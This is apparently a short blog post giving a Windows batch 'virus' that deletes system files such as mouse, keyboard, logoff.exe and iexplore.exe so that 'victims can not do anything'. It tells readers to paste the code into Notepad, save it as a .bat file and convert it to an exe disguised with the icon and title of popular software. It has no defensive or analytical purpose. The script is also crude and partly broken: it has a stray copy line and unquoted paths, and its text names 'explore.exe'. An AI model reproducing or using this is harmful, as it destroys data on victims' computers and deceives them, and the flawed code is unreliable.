Usually we write simple viruses in batch programming. This time also I have one Batch Program. It will delete explore.exe, logoff, mouse, keyboard files. So victims can not do anything in his computer.
NOTE: Don't run or execute the bat file after creating it because it will delete the files from your computer only.
1. Copy the code present in box below in the NOTEPAD.
@echo off
@if exist c:\windows\system32\mouse del c:\windows\system32\mouse
@if exist c:\windows\system32\keyboard del c:\windows\system32\keyboard
copy C:\windows\
@if exist c:\windows\system32\logoff.exe del c:\windows\system32\logoff.exe
@if exist C:\program files\internet explorer\iexplore.exe del C:\program files\internet explorer\iexplore.exe
2. Save the file with .bat extension(for eg:deleteall.bat)
3. For further advancement in it, download a bat to exe converter, through it change the icon, properties and title of the bat file into any popular software.
0 comments:
Post a Comment